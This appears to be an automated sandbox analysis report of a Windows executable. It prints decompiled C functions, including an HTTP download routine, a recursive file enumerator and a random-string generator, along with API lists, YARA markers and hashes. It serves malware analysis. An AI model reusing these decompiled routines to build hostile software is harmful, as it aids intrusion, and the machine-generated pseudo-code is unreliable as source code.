                                                                                                                              0x004129e2
                                                                                                                              0x004129e8
                                                                                                                              0x004129eb
                                                                                                                              0x004129ed
                                                                                                                              0x004129f0
                                                                                                                              0x004129f0
                                                                                                                              0x004129f0
                                                                                                                              0x004129f0
                                                                                                                              0x00000000
                                                                                                                              0x004129f4
                                                                                                                              0x0041297f
                                                                                                                              0x00412982
                                                                                                                              0x00412988
                                                                                                                              0x0041298b
                                                                                                                              0x004129b2
                                                                                                                              0x004129b5
                                                                                                                              0x004129bb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004129bd
                                                                                                                              0x004129c0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004129c2
                                                                                                                              0x004129c2
                                                                                                                              0x004129c8
                                                                                                                              0x004129cb
                                                                                                                              0x0041293a
                                                                                                                              0x0041293a
                                                                                                                              0x004129d4
                                                                                                                              0x00000000
                                                                                                                              0x004129d4
                                                                                                                              0x0041298d
                                                                                                                              0x00412990
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00412994
                                                                                                                              0x004129a5
                                                                                                                              0x004129ab
                                                                                                                              0x004129ad
                                                                                                                              0x004129b0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004129b0
                                                                                                                              0x0041294e
                                                                                                                              0x00412951
                                                                                                                              0x00412953
                                                                                                                              0x00412958
                                                                                                                              0x00412958
                                                                                                                              0x00000000
                                                                                                                              0x00412929
                                                                                                                              0x00412929
                                                                                                                              0x0041292e
                                                                                                                              0x00412932
                                                                                                                              0x00412932
                                                                                                                              0x00000000
                                                                                                                              0x0041292e
                                                                                                                              0x00412927

                                                                                                                              APIs
                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00412941
                                                                                                                              • __isleadbyte_l.LIBCMT ref: 00412974
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00406050,?,00000000,00000000,?,?,?,?,00406050), ref: 004129A5
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00406050,00000001,00000000,00000000,?,?,?,?,00406050), ref: 00412A13
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3058430110-0
                                                                                                                              • Opcode ID: 5262f571036a97c1c7da622207812800115a15d2a58c544429f7316070d59686
                                                                                                                              • Instruction ID: 748d39fc02a1482a1694b034eaf44fbe9bd7851bf869aa2a1f084360d49be2e6
                                                                                                                              • Opcode Fuzzy Hash: 5262f571036a97c1c7da622207812800115a15d2a58c544429f7316070d59686
                                                                                                                              • Instruction Fuzzy Hash: 9031A3B1B10245EFCB20CF68CA809FF3BA4AF05310F14456AE4A5DB2A1D374D9E1DB59
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041A580, Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E0041A580(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				CHAR* _v12;
				signed int _t24;
				CHAR* _t26;
				CHAR* _t33;
				void* _t40;
				void* _t42;

				_v12 = E0040537B(__edx, __edi, __esi, _a4);
				 *_v12 = 0;
				E00406DA4(GetTickCount());
				_t42 = _t40 + 8;
				_v8 = 0;
				while(1) {
					_t44 = _v8 - _a4;
					if(_v8 >= _a4) {
						break;
					}
					_t24 = E00406DB6(_t44);
					asm("cdq");
					_t26 =  *0x4325ac; // 0x23371a8
					wsprintfA(_v12, _t26, _v12, _t24 % 0xa);
					_t42 = _t42 + 0x10;
					_v8 = _v8 + 1;
				}
				_t33 =  &(_v12[_v8]);
				__eflags = _t33;
				 *_t33 = 0;
				return _v12;
			}










                                                                                                                              0x0041a592
                                                                                                                              0x0041a598
                                                                                                                              0x0041a5a2
                                                                                                                              0x0041a5a7
                                                                                                                              0x0041a5aa
                                                                                                                              0x0041a5bc
                                                                                                                              0x0041a5bf
                                                                                                                              0x0041a5c2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0041a5c4
                                                                                                                              0x0041a5c9
                                                                                                                              0x0041a5d6
                                                                                                                              0x0041a5e0
                                                                                                                              0x0041a5e6
                                                                                                                              0x0041a5b9
                                                                                                                              0x0041a5b9
                                                                                                                              0x0041a5ee
                                                                                                                              0x0041a5ee
                                                                                                                              0x0041a5f1
                                                                                                                              0x0041a5fa

                                                                                                                              APIs
                                                                                                                              • _malloc.LIBCMT ref: 0041A58A
                                                                                                                                • Part of subcall function 0040537B: __FF_MSGBANNER.LIBCMT ref: 00405394
                                                                                                                                • Part of subcall function 0040537B: __NMSG_WRITE.LIBCMT ref: 0040539B
                                                                                                                                • Part of subcall function 0040537B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004046A4,00000001,00000000,?,?,?,00404702,?), ref: 004053C0
                                                                                                                              • GetTickCount.KERNEL32 ref: 0041A59B
                                                                                                                                • Part of subcall function 00406DA4: __getptd.LIBCMT ref: 00406DA9
                                                                                                                              • _rand.LIBCMT ref: 0041A5C4
                                                                                                                                • Part of subcall function 00406DB6: __getptd.LIBCMT ref: 00406DB6
                                                                                                                              • wsprintfA.USER32 ref: 0041A5E0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: __getptd$AllocateCountHeapTick_malloc_randwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2840978672-0
                                                                                                                              • Opcode ID: 8b550ce772eb4328ed767da7f6c05529202120f6ffafe6cd6f82c0c63f901a17
                                                                                                                              • Instruction ID: f7510c268ca7bdd400d15516708255d11f6b2277ba4255db8175b93d86fce6df
                                                                                                                              • Opcode Fuzzy Hash: 8b550ce772eb4328ed767da7f6c05529202120f6ffafe6cd6f82c0c63f901a17
                                                                                                                              • Instruction Fuzzy Hash: B40184B0E05108FBDB00DF99C941B9DBBB6EF49305F104099E905A7341D674AB50CBAA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00422200, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 180COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 47%
                                                                                                                              			E00422200(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v8;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				char _v56;
				char _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				char _v112;
				intOrPtr _v116;
				signed int _t77;
				signed int _t78;
				intOrPtr _t93;
				intOrPtr _t116;
				intOrPtr _t128;
				intOrPtr _t138;
				intOrPtr _t154;
				intOrPtr _t155;
				signed int _t156;
				void* _t160;

				_t155 = __esi;
				_t154 = __edi;
				_t116 = __ebx;
				_push(0xffffffff);
				_push(E00426667);
				_push( *[fs:0x0]);
				_t77 =  *0x4301f4; // 0xe687535
				_t78 = _t77 ^ _t156;
				_v28 = _t78;
				_push(_t78);
				 *[fs:0x0] =  &_v16;
				_v116 = __ecx;
				E004011C0( &_v56, _a4);
				_v8 = 0;
				_v20 = E00401EE0( &_v56, "http://", 0);
				_t160 = _v20 -  *0x42d8c4; // 0xffffffff
				if(_t160 != 0) {
					E00401B90( &_v56, _v20, 7);
				}
				_v20 = E00401370( &_v56, 0x2f, 0);
				E00401F30( &_v56,  &_v84, 0, _v20);
				_v8 = 1;
				E00401B90( &_v56, 0, _v20);
				_v20 = 0;
				E00401E10(_v116 + 0x44, 0x104, _a4, 0x103);
				_v24 = 0;
				if( *((intOrPtr*)(_v116 + 0x38)) != 0) {
					_v24 = _v24 | 0x00000003;
				}
				_t128 = _v116;
				_t150 =  *((intOrPtr*)(_t128 + 0xc));
				_v88 =  *0x4327d4( *((intOrPtr*)(_t128 + 0xc)), _v24,  *((intOrPtr*)(_v116 + 0x38)), 0, 0);
				if(_v88 != 0) {
					_v92 = 1;
					 *0x432838(_v88, 0x41,  &_v92, 4);
					_t138 = _v116;
					_t150 =  *((intOrPtr*)(_t138 + 0x3c));
					_v96 =  *0x432900(_v88, E00401330( &_v84), 0x50,  *((intOrPtr*)(_t138 + 0x3c)),  *((intOrPtr*)(_v116 + 0x40)), 3, 0, 1);
					if(_v96 != 0) {
						_v100 =  *0x43283c(_v96, "GET", E00401330( &_v56), 0, 0, 0, 0x400000, 1);
						if(_v100 != 0) {
							E004217A0(_t116, _v116, _t154, _t155, _v100);
							_v104 =  *0x432830(_v100, 0, 0, 0, 0);
							if(_v104 != 0) {
								_v20 = E00421CF0(_t116, _v116, _t154, _t155, _v100);
							}
							_t150 = _v100;
							 *0x432800(_v100);
						}
						 *0x432800(_v96);
					}
					 *0x432800(_v88);
				}
				if(_v20 <= 0) {
					_v112 = 0;
					_v8 = 0;
					E004012D0( &_v84);
					_v8 = 0xffffffff;
					E004012D0( &_v56);
					_t93 = _v112;
				} else {
					_v108 = 1;
					_v8 = 0;
					E004012D0( &_v84);
					_v8 = 0xffffffff;
					E004012D0( &_v56);
					_t93 = _v108;
				}
				 *[fs:0x0] = _v16;
				return E00404354(_t93, _t116, _v28 ^ _t156, _t150, _t154, _t155);
			}




























                                                                                                                              0x00422200
                                                                                                                              0x00422200
                                                                                                                              0x00422200
                                                                                                                              0x00422203
                                                                                                                              0x00422205
                                                                                                                              0x00422210
                                                                                                                              0x00422214
                                                                                                                              0x00422219
                                                                                                                              0x0042221b
                                                                                                                              0x0042221e
                                                                                                                              0x00422222
                                                                                                                              0x00422228
                                                                                                                              0x00422232
                                                                                                                              0x00422237
                                                                                                                              0x0042224d
                                                                                                                              0x00422253
                                                                                                                              0x00422259
                                                                                                                              0x00422264
                                                                                                                              0x00422264
                                                                                                                              0x00422275
                                                                                                                              0x00422285
                                                                                                                              0x0042228a
                                                                                                                              0x00422297
                                                                                                                              0x0042229c
                                                                                                                              0x004222b8
                                                                                                                              0x004222c0
                                                                                                                              0x004222ce
                                                                                                                              0x004222d6
                                                                                                                              0x004222d6
                                                                                                                              0x004222e8
                                                                                                                              0x004222eb
                                                                                                                              0x004222f5
                                                                                                                              0x004222fc
                                                                                                                              0x00422302
                                                                                                                              0x00422315
                                                                                                                              0x00422328
                                                                                                                              0x0042232b
                                                                                                                              0x00422344
                                                                                                                              0x0042234b
                                                                                                                              0x00422372
                                                                                                                              0x00422379
                                                                                                                              0x00422382
                                                                                                                              0x00422399
                                                                                                                              0x004223a0
                                                                                                                              0x004223ae
                                                                                                                              0x004223ae
                                                                                                                              0x004223b1
                                                                                                                              0x004223b5
                                                                                                                              0x004223b5
                                                                                                                              0x004223bf
                                                                                                                              0x004223bf
                                                                                                                              0x004223c9
                                                                                                                              0x004223c9
                                                                                                                              0x004223d3
                                                                                                                              0x004223fe
                                                                                                                              0x00422405
                                                                                                                              0x0042240c
                                                                                                                              0x00422411
                                                                                                                              0x0042241b
                                                                                                                              0x00422420
                                                                                                                              0x004223d5
                                                                                                                              0x004223d5
                                                                                                                              0x004223dc
                                                                                                                              0x004223e3
                                                                                                                              0x004223e8
                                                                                                                              0x004223f2
                                                                                                                              0x004223f7
                                                                                                                              0x004223f7
                                                                                                                              0x00422443
                                                                                                                              0x00422458

                                                                                                                              APIs
                                                                                                                              • __mbstowcs_l.LIBCMTD ref: 004222B8
                                                                                                                                • Part of subcall function 00421CF0: InternetReadFile.WININET(0042280B,?,000003E8,00000000), ref: 00421DBA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileInternetRead__mbstowcs_l
                                                                                                                              • String ID: GET$http://
                                                                                                                              • API String ID: 2406715301-1632879366
                                                                                                                              • Opcode ID: 3594bfadbcd0b2e168513e83fb03b8f3dc0df1efc696576d5205c50443355d01
                                                                                                                              • Instruction ID: 610c6cca322e3e47b99bbd2dde3902dd4f332298f4cea05fed20cb52f9e14152
                                                                                                                              • Opcode Fuzzy Hash: 3594bfadbcd0b2e168513e83fb03b8f3dc0df1efc696576d5205c50443355d01
                                                                                                                              • Instruction Fuzzy Hash: 0A711670A00218ABDB14EBE4DD95BEEB7B5BF04704F60412DF502BB2D1DBB86945CB58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 004202A0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 43%
                                                                                                                              			E004202A0(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags, char* _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				char _v276;
				intOrPtr _v284;
				char _v844;
				char* _v848;
				intOrPtr* _v852;
				char _v853;
				char _v854;
				char* _v860;
				char* _v864;
				intOrPtr* _v868;
				intOrPtr* _v872;
				char _v873;
				char _v874;
				char* _v880;
				char* _v884;
				signed int _t76;
				intOrPtr _t80;
				intOrPtr _t82;
				void* _t87;
				signed int _t91;
				intOrPtr* _t94;
				intOrPtr* _t95;
				signed int _t108;
				char _t111;
				char _t112;
				char _t113;
				char _t114;
				signed int _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t141;

				_t133 = __esi;
				_t132 = __edi;
				_t115 = __edx;
				_t100 = __ebx;
				_t76 =  *0x4301f4; // 0xe687535
				_v12 = _t76 ^ _t134;
				 *0x4328d0(_a12);
				_t101 = _a12;
				_t80 = E0041FB40(__ebx, __edx, __edi, __esi, _a12);
				_t136 = _t135 + 4;
				_v284 = _t80;
				if(_v284 == 0) {
					L28:
					__eflags = _v12 ^ _t134;
					return E00404354(_t80, _t100, _v12 ^ _t134, _t115, _t132, _t133);
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t82 = E0041FB20(_t101, _v284);
					_t137 = _t136 + 4;
					_v8 = _t82;
					if(_v8 == 0) {
						break;
					}
					E004091C0( &_v844, 0, 0x104);
					 *0x432768( &_v844, "%s\\%s", _a12, _v8 + 0x14);
					_t87 = E004052FA(_t133, _a8, 0x4294cd);
					_t141 = _t137 + 0x24;
					if(_t87 != 0) {
						_t108 = _v8 + 0x14;
						__eflags = _t108;
						 *0x432768( &_v276, "%s\\%s", _a8, _t108);
						_t136 = _t141 + 0x10;
					} else {
						 *0x432768( &_v276, "%s", _v8 + 0x14);
						_t136 = _t141 + 0xc;
					}
					if( *((intOrPtr*)(_v8 + 0x10)) != 0x4000) {
						_t101 = _v8 + 0x14;
						_t91 =  *0x432818(_v8 + 0x14, _a16);
						__eflags = _t91;
						if(_t91 != 0) {
							_t101 = _a4;
							E00419580(_a4,  &_v276,  &_v844);
							_t136 = _t136 + 0xc;
						}
						goto L26;
					} else {
						_v848 = ".";
						_v852 = _v8 + 0x14;
						while(1) {
							_t94 = _v852;
							_t111 =  *_t94;
							_v853 = _t111;
							if(_t111 !=  *_v848) {
								break;
							}
							if(_v853 == 0) {
								L11:
								_v860 = 0;
								L13:
								_t101 = _v860;
								_v864 = _v860;
								if(_v864 == 0) {
									L22:
									goto L1;
								}
								_v868 = "..";
								_v872 = _v8 + 0x14;
								while(1) {
									_t95 = _v872;
									_t112 =  *_t95;
									_v873 = _t112;
									if(_t112 !=  *_v868) {
										break;
									}
									if(_v873 == 0) {
										L19:
										_v880 = 0;
										L21:
										_t101 = _v880;
										_v884 = _v880;
										if(_v884 != 0) {
											_t101 =  &_v276;
											E004202A0(_t100, _a4, _t132, _t133, __eflags, _a4,  &_v276,  &_v844, _a16);
											_t136 = _t136 + 0x10;
											L26:
											goto L1;
										}
										goto L22;
									}
									_t95 = _v872;
									_t113 =  *((intOrPtr*)(_t95 + 1));
									_v874 = _t113;
									_t54 = _v868 + 1; // 0x2c00002e
									if(_t113 !=  *_t54) {
										break;
									}
									_v872 = _v872 + 2;
									_v868 = _v868 + 2;
									if(_v874 != 0) {
										continue;
									}
									goto L19;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								_v880 = _t95;
								goto L21;
							}
							_t94 = _v852;
							_t114 =  *((intOrPtr*)(_t94 + 1));
							_v854 = _t114;
							_t32 =  &(_v848[1]); // 0x2e000000
							if(_t114 !=  *_t32) {
								break;
							}
							_v852 = _v852 + 2;
							_v848 =  &(_v848[2]);
							if(_v854 != 0) {
								continue;
							}
							goto L11;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						_v860 = _t94;
						goto L13;
					}
				}
				_t115 = _v284;
				_t80 = E0041F970(_t101, _v284);
				goto L28;
			}





































                                                                                                                              0x004202a0
                                                                                                                              0x004202a0
                                                                                                                              0x004202a0
                                                                                                                              0x004202a0
                                                                                                                              0x004202a9
                                                                                                                              0x004202b0
                                                                                                                              0x004202b7
                                                                                                                              0x004202bd
                                                                                                                              0x004202c1
                                                                                                                              0x004202c6
                                                                                                                              0x004202c9
                                                                                                                              0x004202d6
                                                                                                                              0x00420525
                                                                                                                              0x00420528
                                                                                                                              0x00420532
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004202dc
                                                                                                                              0x004202dc
                                                                                                                              0x004202e3
                                                                                                                              0x004202e8
                                                                                                                              0x004202eb
                                                                                                                              0x004202f2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00420306
                                                                                                                              0x00420325
                                                                                                                              0x00420337
                                                                                                                              0x0042033c
                                                                                                                              0x00420341
                                                                                                                              0x00420364
                                                                                                                              0x00420364
                                                                                                                              0x00420378
                                                                                                                              0x0042037e
                                                                                                                              0x00420343
                                                                                                                              0x00420356
                                                                                                                              0x0042035c
                                                                                                                              0x0042035c
                                                                                                                              0x0042038b
                                                                                                                              0x004204e9
                                                                                                                              0x004204ed
                                                                                                                              0x004204f3
                                                                                                                              0x004204f5
                                                                                                                              0x00420505
                                                                                                                              0x00420509
                                                                                                                              0x0042050e
                                                                                                                              0x0042050e
                                                                                                                              0x00000000
                                                                                                                              0x00420391
                                                                                                                              0x00420391
                                                                                                                              0x004203a1
                                                                                                                              0x004203a7
                                                                                                                              0x004203a7
                                                                                                                              0x004203ad
                                                                                                                              0x004203af
                                                                                                                              0x004203bd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004203c6
                                                                                                                              0x004203f9
                                                                                                                              0x004203f9
                                                                                                                              0x00420410
                                                                                                                              0x00420410
                                                                                                                              0x00420416
                                                                                                                              0x00420423
                                                                                                                              0x004204bd
                                                                                                                              0x00000000
                                                                                                                              0x004204bd
                                                                                                                              0x00420429
                                                                                                                              0x00420439
                                                                                                                              0x0042043f
                                                                                                                              0x0042043f
                                                                                                                              0x00420445
                                                                                                                              0x00420447
                                                                                                                              0x00420455
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0042045e
                                                                                                                              0x00420491
                                                                                                                              0x00420491
                                                                                                                              0x004204a8
                                                                                                                              0x004204a8
                                                                                                                              0x004204ae
                                                                                                                              0x004204bb
                                                                                                                              0x004204cd
                                                                                                                              0x004204d8
                                                                                                                              0x004204dd
                                                                                                                              0x00420511
                                                                                                                              0x00000000
                                                                                                                              0x00420511
                                                                                                                              0x00000000
                                                                                                                              0x004204bb
                                                                                                                              0x00420460
                                                                                                                              0x00420466
                                                                                                                              0x00420469
                                                                                                                              0x00420475
                                                                                                                              0x00420478
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0042047a
                                                                                                                              0x00420481
                                                                                                                              0x0042048f
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0042048f
                                                                                                                              0x0042049d
                                                                                                                              0x0042049f
                                                                                                                              0x004204a2
                                                                                                                              0x00000000
                                                                                                                              0x004204a2
                                                                                                                              0x004203c8
                                                                                                                              0x004203ce
                                                                                                                              0x004203d1
                                                                                                                              0x004203dd
                                                                                                                              0x004203e0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004203e2
                                                                                                                              0x004203e9
                                                                                                                              0x004203f7
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x004203f7
                                                                                                                              0x00420405
                                                                                                                              0x00420407
                                                                                                                              0x0042040a
                                                                                                                              0x00000000
                                                                                                                              0x0042040a
                                                                                                                              0x0042038b
                                                                                                                              0x00420516
                                                                                                                              0x0042051d
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset
                                                                                                                              • String ID: %s\%s$%s\%s
                                                                                                                              • API String ID: 2102423945-3515709335
                                                                                                                              • Opcode ID: 141f0e15cebe44d10cad8ad4f2c8c8da476f08cf655785c2c70918d9b4770972
                                                                                                                              • Instruction ID: ae06e90ec2fe91b52258a92f08eb3126106a9cd97fdc9158904f1280b265a2f4
                                                                                                                              • Opcode Fuzzy Hash: 141f0e15cebe44d10cad8ad4f2c8c8da476f08cf655785c2c70918d9b4770972
                                                                                                                              • Instruction Fuzzy Hash: F1718DB0E00268ABCB26DF24EC45BEEB7B9AF44304F5481DAE51967282D7349F84CF54
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402A30, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 78%
                                                                                                                              			E00402A30(void* __eflags, signed int _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				void* __ecx;
				signed int _t50;
				void* _t66;
				intOrPtr* _t74;
				signed int _t109;
				void* _t110;

				_push(0xffffffff);
				_push(E00426790);
				_push( *[fs:0x0]);
				_push(_t74);
				_t50 =  *0x4301f4; // 0xe687535
				_push(_t50 ^ _t109);
				_t1 =  &_v16; // 0x40284c
				 *[fs:0x0] = _t1;
				_v20 = _t110 - 0x14;
				_v32 = _t74;
				_v28 = _a4 | 0x00000007;
				if(E004029F0(_v32) >= _v28) {
					if( *(_v32 + 0x14) >> 1 > _v28 / 3) {
						if( *(_v32 + 0x14) > E004029F0(_v32) - ( *(_v32 + 0x14) >> 1)) {
							_v28 = E004029F0(_v32);
						} else {
							_v28 = ( *(_v32 + 0x14) >> 1) +  *(_v32 + 0x14);
						}
					}
				} else {
					_v28 = _a4;
				}
				_v8 = 0;
				_v36 = E00402C20(_v32 + 0x18, _v28 + 1);
				_v24 = _v36;
				_v8 = 0xffffffff;
				if(_a8 > 0) {
					E00401D90(_v24, E004028B0(_v32), _a8);
				}
				E00402510(_v32, 1, 0);
				 *_v32 = _v24;
				 *(_v32 + 0x14) = _v28;
				_t66 = E004027D0(_v32, _a8);
				 *[fs:0x0] = _v16;
				return _t66;
			}
















                                                                                                                              0x00402a33
                                                                                                                              0x00402a35
                                                                                                                              0x00402a40
                                                                                                                              0x00402a41
                                                                                                                              0x00402a48
                                                                                                                              0x00402a4f
                                                                                                                              0x00402a50
                                                                                                                              0x00402a53
                                                                                                                              0x00402a59
                                                                                                                              0x00402a5c
                                                                                                                              0x00402a65
                                                                                                                              0x00402a73
                                                                                                                              0x00402a93
                                                                                                                              0x00402aaf
                                                                                                                              0x00402acc
                                                                                                                              0x00402ab1
                                                                                                                              0x00402abf
                                                                                                                              0x00402abf
                                                                                                                              0x00402aaf
                                                                                                                              0x00402a75
                                                                                                                              0x00402a78
                                                                                                                              0x00402a78
                                                                                                                              0x00402acf
                                                                                                                              0x00402ae8
                                                                                                                              0x00402aee
                                                                                                                              0x00402b53
                                                                                                                              0x00402b5e
                                                                                                                              0x00402b71
                                                                                                                              0x00402b76
                                                                                                                              0x00402b80
                                                                                                                              0x00402b8b
                                                                                                                              0x00402b93
                                                                                                                              0x00402b9d
                                                                                                                              0x00402ba5
                                                                                                                              0x00402bb3

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 004029F0: allocator.LIBCPMTD ref: 004029FF
                                                                                                                              • allocator.LIBCPMTD ref: 00402AE3
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000001.200815545.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000001.200881963.0000000000435000.00000040.00020000.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: allocator
                                                                                                                              • String ID: L(@$L(@
                                                                                                                              • API String ID: 3447690668-3499801750
                                                                                                                              • Opcode ID: 731b4b76927b907a781150df7e213fad6c683a46f741f261f2f8bc9c7cf901da
                                                                                                                              • Instruction ID: 751f628dbb05e49963d70d8b56bea994ec05a6975946ef0d85e5d01896618b88
                                                                                                                              • Opcode Fuzzy Hash: 731b4b76927b907a781150df7e213fad6c683a46f741f261f2f8bc9c7cf901da
                                                                                                                              • Instruction Fuzzy Hash: 1E4111B0E0010A9FCB14DF99D995AAFB7B5FF48314F20812AE415B73C1D778A941CBA5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0041A890, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E0041A890(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				char _v17;
				intOrPtr _v24;

				_v8 = E00402D10(_a4, _a8);
				if(_v8 != 0) {
					E00406C80(0x432ad0, _a4, _v8 - _a4);
					 *(_v8 - _a4 + 0x432ad0) = 0;
					_v12 = _a8;
					_v16 = _v12 + 1;
					do {
						_v17 =  *_v12;
						_v12 = _v12 + 1;
					} while (_v17 != 0);
					_v24 = _v12 - _v16;
					wsprintfA(_v8 - _a4 + 0x432ad0, "%s%s", _a12, _v8 + _v24);
					return 0x432ad0;
				}
				return _a4;
			}








                                                                                                                              0x0041a8a6
                                                                                                                              0x0041a8ad
                                                                                                                              0x0041a8c4
                                                                                                                              0x0041a8d2
                                                                                                                              0x0041a8dc
                                                                                                                              0x0041a8e5
                                                                                                                              0x0041a8e8
                                                                                                                              0x0041a8ed
                                                                                                                              0x0041a8f0
                                                                                                                              0x0041a8f4
                                                                                                                              0x0041a900
                                                                                                                              0x0041a91f
                                                                                                                              0x00000000
                                                                                                                              0x0041a928
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.218824544.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.218862708.0000000000435000.00000040.00000001.sdmp Download File
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _strncpywsprintf
                                                                                                                              • String ID: %s%s
                                                                                                                              • API String ID: 782160923-3252725368
                                                                                                                              • Opcode ID: 2ff7557cfefc55b55b8ef6b0744d053a5d09cf04ee3597d303589e470055fe13
                                                                                                                              • Instruction ID: 8fce42188a2fd6d43e20bb7c24b13ff7e11081aec796499b2cac7fda46006618
                                                                                                                              • Opcode Fuzzy Hash: 2ff7557cfefc55b55b8ef6b0744d053a5d09cf04ee3597d303589e470055fe13
                                                                                                                              • Instruction Fuzzy Hash: D2213A75D00108FFDF00EFA8C995ADDBBB4EF48308F108199E909AB341D675AB94DB99
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00425B1A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E00425B1A(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E004255DA(__ebx, __edx, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E0040844B(__edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E0040844B(__edx, __edi, __eflags);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
